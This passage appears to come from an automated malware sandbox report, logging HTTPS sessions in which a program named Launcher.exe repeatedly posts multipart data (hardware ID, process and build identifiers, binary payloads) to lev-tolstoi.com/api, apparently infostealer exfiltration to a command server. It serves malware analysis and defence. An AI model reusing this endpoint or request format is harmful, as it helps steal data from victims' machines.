                                                                                                                                                                                                                                                          Data Ascii: HPOVAkaaPFh9LIXdgZAuXXVUopK4P+IGszTGwgXFfD74A5XWwh8c2SkZ4T/R8Z7t0Xci8hhvI1JigQf2BTXoK9ynQSJCD7gsfSoQr5WCPl0xl4PGWSty9rKw41OBtWi7LFO11uKebIk5qeHuAVEubRH3UnK4nxPyAnBHVhURvN98csHDxn18WTn59fxxkY6NoBPzVrlLkxJ2xaNWxSW4i9xDRbaSLgxZyflxf8HRLq1Bp5KiKJ/CQuJQ55IBUbh
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 46 4a 43 44 76 67 73 66 53 6d 52 54 67 46 42 6a 76 30 42 46 33 4c 53 75 41 38 6a 41 67 4b 77 56 7a 62 56 4e 57 68 72 54 42 4d 46 5a 32 4a 4f 6a 49 6b 70 6a 51 55 37 49 64 44 71 61 46 56 31 67 6d 44 4a 33 69 4a 44 31 73 48 54 74 35 47 31 79 50 39 35 68 30 58 32 73 75 37 4d 71 58 6e 5a 38 5a 2f 42 77 51 36 39 67 59 64 54 67 74 67 2f 51 39 4a 43 63 51 64 57 31 66 56 34 65 2f 79 7a 34 63 4b 6d 66 6b 32 74 2f 4b 30 43 6a 2f 46 52 62 6c 79 31 64 67 5a 44 7a 4e 2f 6a 70 72 64 45 4a 35 62 6c 74 55 6a 37 76 4c 50 46 31 6f 4b 65 54 48 6c 70 71 59 44 2f 4d 65 48 75 66 54 47 48 34 75 49 49 6a 39 4d 53 38 71 44 54 55 75 47 31 79 62 39 35 68 30 63 30 4d 53 6f 65 4f 6c 30 6f 39 54 36 31 6f 52 36 70 31 50 50 79 59 6d 67 66 45 35 4c 53 55 4f 66 32 6c 51 56 34 69 7a 7a 44
                                                                                                                                                                                                                                                          Data Ascii: FJCDvgsfSmRTgFBjv0BF3LSuA8jAgKwVzbVNWhrTBMFZ2JOjIkpjQU7IdDqaFV1gmDJ3iJD1sHTt5G1yP95h0X2su7MqXnZ8Z/BwQ69gYdTgtg/Q9JCcQdW1fV4e/yz4cKmfk2t/K0Cj/FRbly1dgZDzN/jprdEJ5bltUj7vLPF1oKeTHlpqYD/MeHufTGH4uIIj9MS8qDTUuG1yb95h0c0MSoeOl0o9T61oR6p1PPyYmgfE5LSUOf2lQV4izzD
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 34 73 4f 5a 67 4a 63 55 34 42 51 62 36 64 55 66 64 69 73 68 69 50 51 77 4a 79 59 44 63 6d 35 56 55 38 50 35 67 44 4e 45 4a 48 2b 6a 34 34 2b 4a 67 67 76 2f 4f 78 76 70 6e 51 67 78 4d 32 57 4b 39 58 5a 7a 62 41 74 6e 5a 46 5a 4a 69 72 44 4f 4f 31 39 32 4a 75 37 4a 6a 5a 57 66 47 66 55 57 45 4f 6e 62 46 6e 6f 67 4b 59 72 38 50 53 51 67 51 6a 73 67 58 45 50 44 37 34 41 61 56 33 63 77 34 4d 79 55 68 49 74 64 37 56 51 50 70 74 6f 62 50 33 4a 6c 6a 76 49 39 4c 79 77 4f 64 57 52 57 57 35 47 34 78 7a 4e 56 62 7a 58 70 78 5a 69 5a 6d 42 62 39 48 41 54 71 30 77 56 36 4f 44 66 4e 74 33 59 73 4e 45 49 74 49 47 31 63 6b 36 66 44 64 6d 31 79 4a 50 58 4a 6b 70 37 51 41 72 77 44 56 75 48 52 56 79 64 71 49 34 4c 77 4e 53 51 74 43 33 6c 74 58 6c 4b 47 74 73 59 77 56 6d 34
                                                                                                                                                                                                                                                          Data Ascii: 4sOZgJcU4BQb6dUfdishiPQwJyYDcm5VU8P5gDNEJH+j44+Jggv/OxvpnQgxM2WK9XZzbAtnZFZJirDOO192Ju7JjZWfGfUWEOnbFnogKYr8PSQgQjsgXEPD74AaV3cw4MyUhItd7VQPptobP3JljvI9LywOdWRWW5G4xzNVbzXpxZiZmBb9HATq0wV6ODfNt3YsNEItIG1ck6fDdm1yJPXJkp7QArwDVuHRVydqI4LwNSQtC3ltXlKGtsYwVm4
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 34 33 65 42 4c 49 64 47 71 61 46 56 33 77 74 4a 6f 7a 7a 50 79 63 6a 42 58 46 79 55 56 79 52 74 73 45 2f 55 57 67 6e 37 73 2b 56 6b 35 6b 51 2f 68 63 52 34 64 49 53 50 32 52 6c 69 75 46 32 63 32 77 6a 65 47 74 58 41 4e 6e 33 33 33 70 46 4a 43 44 76 67 73 66 53 6b 42 66 33 45 42 76 6c 30 68 52 74 4b 79 4f 66 2b 54 73 68 50 67 68 2b 5a 56 5a 57 6a 72 54 47 4d 6c 64 6f 4e 65 72 43 6e 4a 6e 51 55 37 49 64 44 71 61 46 56 31 77 39 4d 34 66 2b 4f 6a 30 6e 41 33 5a 32 56 6b 76 44 2b 59 41 6c 57 33 56 6e 75 39 53 50 68 5a 63 43 76 41 4e 57 34 64 46 58 4a 32 6f 6a 68 50 38 78 4c 53 49 51 63 47 5a 55 56 49 71 2b 78 44 78 66 5a 43 50 6e 78 5a 71 52 6e 42 62 31 47 52 6e 69 31 42 6c 32 4a 57 58 44 75 54 45 7a 62 46 6f 31 51 55 42 59 6a 37 71 41 4b 78 4a 39 5a 2b 54 4f
                                                                                                                                                                                                                                                          Data Ascii: 43eBLIdGqaFV3wtJozzPycjBXFyUVyRtsE/UWgn7s+Vk5kQ/hcR4dISP2RliuF2c2wjeGtXANn333pFJCDvgsfSkBf3EBvl0hRtKyOf+TshPgh+ZVZWjrTGMldoNerCnJnQU7IdDqaFV1w9M4f+Oj0nA3Z2VkvD+YAlW3Vnu9SPhZcCvANW4dFXJ2ojhP8xLSIQcGZUVIq+xDxfZCPnxZqRnBb1GRni1Bl2JWXDuTEzbFo1QUBYj7qAKxJ9Z+TO
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 32 71 57 6a 62 74 79 78 4a 34 50 47 65 34 2b 6a 67 6c 4b 78 51 31 66 32 51 56 77 37 6a 61 64 41 52 64 50 71 50 46 6b 39 4c 49 58 65 63 64 46 75 48 48 41 58 67 6d 4e 49 62 30 4f 67 6b 6a 42 57 4e 6a 56 46 69 53 76 6f 77 2f 55 53 52 70 6f 38 57 48 30 73 68 64 33 52 30 41 35 66 49 55 62 69 4e 6c 77 37 6b 78 50 57 78 61 4e 56 34 62 53 59 43 6e 77 7a 74 4e 57 6d 65 37 32 36 48 53 6d 77 76 31 43 68 58 77 31 68 70 7a 4f 78 76 4e 6f 57 4a 35 66 6c 41 6e 4d 6b 51 62 6e 49 69 4f 64 46 30 6b 66 39 72 62 33 34 54 51 52 61 42 55 56 76 53 64 54 7a 39 74 4a 70 2f 72 4d 43 67 36 41 54 4a 65 5a 58 79 56 76 63 63 6b 57 33 4d 6f 6f 34 7a 66 6e 64 42 46 79 31 6f 66 34 63 59 47 61 53 63 31 69 72 6b 4a 5a 57 77 61 4e 54 67 62 62 6f 43 35 7a 6a 4e 4b 64 57 72 45 31 4a 57 56 67
                                                                                                                                                                                                                                                          Data Ascii: 2qWjbtyxJ4PGe4+jglKxQ1f2QVw7jadARdPqPFk9LIXecdFuHHAXgmNIb0OgkjBWNjVFiSvow/USRpo8WH0shd3R0A5fIUbiNlw7kxPWxaNV4bSYCnwztNWme726HSmwv1ChXw1hpzOxvNoWJ5flAnMkQbnIiOdF0kf9rb34TQRaBUVvSdTz9tJp/rMCg6ATJeZXyVvcckW3Moo4zfndBFy1of4cYGaSc1irkJZWwaNTgbboC5zjNKdWrE1JWVg
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 62 36 5a 45 5a 64 43 6f 69 6e 65 38 74 5a 79 51 42 62 33 70 6c 5a 61 69 37 78 6a 4e 47 59 79 48 46 34 74 2f 63 30 42 4b 79 51 69 2b 6d 6c 56 64 41 5a 47 57 56 75 57 35 72 47 51 46 37 62 6c 78 4e 6b 76 72 6f 46 32 5a 65 5a 63 2f 46 69 74 43 6b 47 75 49 4c 48 65 76 52 56 7a 46 71 49 38 32 68 5a 6d 56 73 42 6d 51 67 41 77 76 52 37 4a 56 6e 43 7a 52 31 2f 49 79 47 30 6f 5a 64 71 6b 68 59 70 73 39 58 4a 32 70 69 6a 75 73 6b 4c 53 38 55 64 69 64 6c 5a 61 53 35 78 7a 56 4b 64 44 44 73 2f 4b 47 48 6b 78 50 38 48 51 44 33 6e 56 6b 2f 4a 57 58 56 77 48 5a 6a 62 44 30 37 49 45 4d 62 32 2f 66 31 4e 31 4a 71 49 50 58 54 30 72 57 65 47 76 4d 4d 42 76 48 53 56 7a 46 71 49 38 32 68 5a 47 56 73 42 6d 51 67 41 77 76 52 37 4a 56 6e 43 7a 52 31 2f 49 79 47 30 6f 5a 64 71 6b
                                                                                                                                                                                                                                                          Data Ascii: b6ZEZdCoine8tZyQBb3plZai7xjNGYyHF4t/c0BKyQi+mlVdAZGWVuW5rGQF7blxNkvroF2ZeZc/FitCkGuILHevRVzFqI82hZmVsBmQgAwvR7JVnCzR1/IyG0oZdqkhYps9XJ2pijuskLS8UdidlZaS5xzVKdDDs/KGHkxP8HQD3nVk/JWXVwHZjbD07IEMb2/f1N1JqIPXT0rWeGvMMBvHSVzFqI82hZGVsBmQgAwvR7JVnCzR1/IyG0oZdqk
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 45 44 30 4b 49 70 76 36 64 6d 56 73 44 6a 55 34 47 31 71 4a 70 38 30 37 57 79 67 67 2b 63 58 66 33 4e 41 54 73 6b 4a 57 35 39 63 48 63 69 55 69 77 66 38 34 4a 57 77 64 4f 33 6b 62 54 63 50 76 6b 33 6f 63 64 6d 65 37 67 74 69 52 67 67 2f 30 47 51 44 6c 6d 69 6c 42 42 7a 65 4b 36 54 56 70 48 51 39 78 64 6b 35 59 6b 37 44 2b 43 6e 46 32 49 50 50 42 33 61 4f 47 48 76 49 55 45 61 61 54 56 32 64 71 66 63 33 55 4a 43 77 38 41 54 55 75 47 31 66 44 37 34 41 35 54 6d 4d 33 34 49 36 59 69 4a 64 64 37 56 51 50 70 73 74 58 4a 33 6c 72 7a 65 74 32 63 32 78 46 65 32 31 61 57 49 32 30 30 69 5a 61 5a 7a 48 67 68 61 47 73 76 51 2f 31 43 68 57 6b 37 42 70 37 50 44 43 4f 36 54 45 56 45 69 39 6e 5a 30 74 59 77 5a 76 48 4f 56 42 61 47 64 54 54 6d 49 4c 53 4f 2f 45 4d 46 61 61
                                                                                                                                                                                                                                                          Data Ascii: ED0KIpv6dmVsDjU4G1qJp807Wygg+cXf3NATskJW59cHciUiwf84JWwdO3kbTcPvk3ocdme7gtiRgg/0GQDlmilBBzeK6TVpHQ9xdk5Yk7D+CnF2IPPB3aOGHvIUEaaTV2dqfc3UJCw8ATUuG1fD74A5TmM34I6YiJdd7VQPpstXJ3lrzet2c2xFe21aWI200iZaZzHghaGsvQ/1ChWk7Bp7PDCO6TEVEi9nZ0tYwZvHOVBaGdTTmILSO/EMFaa


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.549713104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:09 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=CCOVNLAI1K
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 12791
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:09 UTC12791OUTData Raw: 2d 2d 43 43 4f 56 4e 4c 41 49 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 33 32 34 45 42 42 39 42 44 38 45 38 38 36 45 30 32 32 45 39 45 46 41 42 32 37 36 46 31 37 0d 0a 2d 2d 43 43 4f 56 4e 4c 41 49 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 43 4f 56 4e 4c 41 49 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 0d 0a 2d 2d 43 43 4f 56 4e 4c 41 49 31 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: --CCOVNLAI1KContent-Disposition: form-data; name="hwid"65324EBB9BD8E886E022E9EFAB276F17--CCOVNLAI1KContent-Disposition: form-data; name="pid"2--CCOVNLAI1KContent-Disposition: form-data; name="lid"yau6Na--622914791--CCOVNLAI1KCont
                                                                                                                                                                                                                                                          2024-12-22 22:50:10 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:10 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=7a7lol6acu5lasgquv15717k9s; expires=Thu, 17 Apr 2025 16:36:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgemJF7%2FF%2BK6N5L0oyA9nvXDena8jKWwTmbFWTcXz7mKPF4cY%2B1tsvZdD9NIpXYsibznhrWzm96HjZQgDBUjS2AxeiID%2F78xERnkERwP1Lpoz3SAsyt%2B7us7D08OiIjWzk8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63ab53d90717b5-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1515&min_rtt=1501&rtt_var=591&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13722&delivery_rate=1809169&cwnd=252&unsent_bytes=0&cid=36f19a56051f4b9b&ts=1155&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-22 22:50:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.549715104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:12 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=FM6LQ1OG
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 15021
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:12 UTC15021OUTData Raw: 2d 2d 46 4d 36 4c 51 31 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 33 32 34 45 42 42 39 42 44 38 45 38 38 36 45 30 32 32 45 39 45 46 41 42 32 37 36 46 31 37 0d 0a 2d 2d 46 4d 36 4c 51 31 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 4d 36 4c 51 31 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 0d 0a 2d 2d 46 4d 36 4c 51 31 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                                          Data Ascii: --FM6LQ1OGContent-Disposition: form-data; name="hwid"65324EBB9BD8E886E022E9EFAB276F17--FM6LQ1OGContent-Disposition: form-data; name="pid"2--FM6LQ1OGContent-Disposition: form-data; name="lid"yau6Na--622914791--FM6LQ1OGContent-Disp
                                                                                                                                                                                                                                                          2024-12-22 22:50:24 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=d6o1cg5c8s8q2bho5832e8cvan; expires=Thu, 17 Apr 2025 16:37:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQ5%2BCG0lhdkcG0dN7wP45po%2FwZz8qHKjuuaxLcmM5FWP%2BTaVYnTQFPB8ujFsII5hD7D3bo%2F%2Fve89NhkGl8ei8CRRZHJEO3yqapCFPgicmEaVnkeBbynUvLFceSXx4OA6k8g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63ab63cc2d1a07-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1782&rtt_var=687&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15950&delivery_rate=1570736&cwnd=245&unsent_bytes=0&cid=d3807a0bc3ba8708&ts=12063&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-22 22:50:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.549745104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:25 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=9VUVW43BOUI50PRN
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20559
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:25 UTC15331OUTData Raw: 2d 2d 39 56 55 56 57 34 33 42 4f 55 49 35 30 50 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 33 32 34 45 42 42 39 42 44 38 45 38 38 36 45 30 32 32 45 39 45 46 41 42 32 37 36 46 31 37 0d 0a 2d 2d 39 56 55 56 57 34 33 42 4f 55 49 35 30 50 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 56 55 56 57 34 33 42 4f 55 49 35 30 50 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --9VUVW43BOUI50PRNContent-Disposition: form-data; name="hwid"65324EBB9BD8E886E022E9EFAB276F17--9VUVW43BOUI50PRNContent-Disposition: form-data; name="pid"3--9VUVW43BOUI50PRNContent-Disposition: form-data; name="lid"yau6Na--622914791
                                                                                                                                                                                                                                                          2024-12-22 22:50:25 UTC5228OUTData Raw: d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc
                                                                                                                                                                                                                                                          Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
                                                                                                                                                                                                                                                          2024-12-22 22:50:26 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:26 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=7ajqfc7j6l348p3vuc7nacm57p; expires=Thu, 17 Apr 2025 16:37:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1GSS3g8gzMOh1P1TZI%2FrjQzp1WaRq0O%2Bi2B2oAo%2FhVxzjXjVqw5SFw%2BnXDhpu9udKxnQyLnc7wFaNQ8B4EAnOhe%2FxsgYxPHDcNmQSLVLHKj2%2BaBiPNeEooC7SpTG%2F417SU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63abb84cdc438e-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1609&rtt_var=618&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21518&delivery_rate=1748502&cwnd=206&unsent_bytes=0&cid=8c682513348b8ac9&ts=979&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-22 22:50:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          6192.168.2.549756104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:28 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=3UJGQBBN0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1207
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:28 UTC1207OUTData Raw: 2d 2d 33 55 4a 47 51 42 42 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 33 32 34 45 42 42 39 42 44 38 45 38 38 36 45 30 32 32 45 39 45 46 41 42 32 37 36 46 31 37 0d 0a 2d 2d 33 55 4a 47 51 42 42 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 55 4a 47 51 42 42 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 0d 0a 2d 2d 33 55 4a 47 51 42 42 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                          Data Ascii: --3UJGQBBN0Content-Disposition: form-data; name="hwid"65324EBB9BD8E886E022E9EFAB276F17--3UJGQBBN0Content-Disposition: form-data; name="pid"1--3UJGQBBN0Content-Disposition: form-data; name="lid"yau6Na--622914791--3UJGQBBN0Content-
                                                                                                                                                                                                                                                          2024-12-22 22:50:29 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:29 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
